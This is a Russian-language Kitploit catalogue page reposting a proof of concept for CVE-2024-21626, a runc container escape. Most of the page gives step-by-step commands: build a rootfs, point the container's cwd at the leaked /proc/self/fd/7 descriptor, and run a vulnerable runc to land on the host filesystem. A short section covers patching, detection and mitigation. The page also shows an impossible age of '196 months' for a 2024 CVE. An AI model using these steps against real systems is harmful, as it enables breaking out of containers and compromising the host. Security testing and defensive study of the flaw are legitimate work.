Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-21626-runc-1.1.11-escape — PoC для CVE-2024-21626: runc утекает внутренний fd, ссылающийся на host CWD перед pivot_root, что позволяет совершить выход из контейнера, установив process.cwd в /proc/self/fd/7 | Kitploit
Инструменты/GitHubGitHub/strikoder-premium/cve-2024-21626-runc-1.1.11-escape
Безопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingПобег из Контейнера
GitHubstrikoder-premium/cve-2024-21626-runc-1.1.11-escape

cve-2024-21626-runc-1.1.11-escape

PoC для CVE-2024-21626: runc утекает внутренний fd, ссылающийся на host CWD перед pivot_root, что позволяет совершить выход из контейнера, установив process.cwd в /proc/self/fd/7

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
196 месяцев назадЕщё не проверено

CVE-2024-21626 - runc Leaky Vessels

Обзор

ПолеОписание
CVECVE-2024-21626
Затронутый компонентrunc ≤ 1.1.11
Класс уязвимостиПобег из контейнера через утечку файлового дескриптора
ПсевдонимLeaky Vessels

Первопричина

runc пропускает внутренний файловый дескриптор (обычно fd/7), указывающий на рабочий каталог файловой системы хоста перед запуском процесса контейнера. Установив cwd контейнера в config.json как /proc/self/fd/7, процесс оказывается в каталоге хоста, а не в корневой файловой системе контейнера — что приводит к побегу из контейнера.


Методы эксплуатации

Метод 1 - Ручная корневая файловая система из бинарников хоста

Создайте минимальную корневую файловую систему, скопировав бинарники непосредственно с хоста:

root@kitploit:~
# 1. Create directory structure
cd /tmp && mkdir -p strikoder/rootfs && cd strikoder
mkdir -p rootfs/lib64 rootfs/lib

# 2. Copy binaries and required libraries
cp -aL /bin rootfs/bin
cp /lib64/ld-linux-x86-64.so.2 rootfs/lib64/
cp -a /lib/x86_64-linux-gnu rootfs/lib

# 3. Generate default OCI config
runc spec

# 4. Patch cwd in config.json to point at leaked host fd
# Change: "cwd": "/"
# To:     "cwd": "/proc/self/fd/7"
vi config.json

# 5. Run the container with the vulnerable runc binary
sudo /opt/debug --log /tmp/log.json run strikontainer

Что происходит: runc открывает fd/7, ссылающийся на CWD хоста, перед переходом в корневую файловую систему контейнера. Установка cwd в /proc/self/fd/7 заставляет runc выполнить chdir() в путь хоста, а не контейнера — вы оказываетесь на реальной файловой системе.


Метод 2 - Docker-образ Alpine в качестве корневой файловой системы

Если вам нужно более полное окружение или на хосте ограниченный набор бинарников:

root@kitploit:~
# --- On your attack machine ---
# Export a minimal Alpine filesystem
docker export $(docker create alpine:latest) > alpine.tar

# Transfer alpine.tar to the target, then:

# --- On target ---
mkdir -p /tmp/strikoder/rootfs && cd /tmp/strikoder
tar -xvf /path/to/alpine.tar -C rootfs

# Generate OCI bundle config
runc spec

# Patch cwd (same as Method 1)
vi config.json
# "cwd": "/proc/self/fd/7"

# Run
sudo /opt/debug --log /tmp/log.json run strikontainer

Обнаружение и смягчение

  • Патч: Обновите runc до ≥ 1.1.12 (или ≥ 1.2.0-rc.2)
  • Обнаружение: Отслеживайте openat() на /proc/self/fd/ в конфигурациях cwd контейнера; оповещайте об OCI-бандлах с cwd, содержащим /proc/self/fd
  • Смягчение: Используйте профили seccomp, ограничивающие доступ к /proc; рассмотрите rootless-контейнеры или gVisor/Kata для более сильной изоляции

Ссылки

  • NVD: CVE-2024-21626
  • Уведомление о безопасности runc на GitHub
  • Блог Snyk о Leaky Vessels
  • HackTheBox - машина GiveBack
Скачать инструмент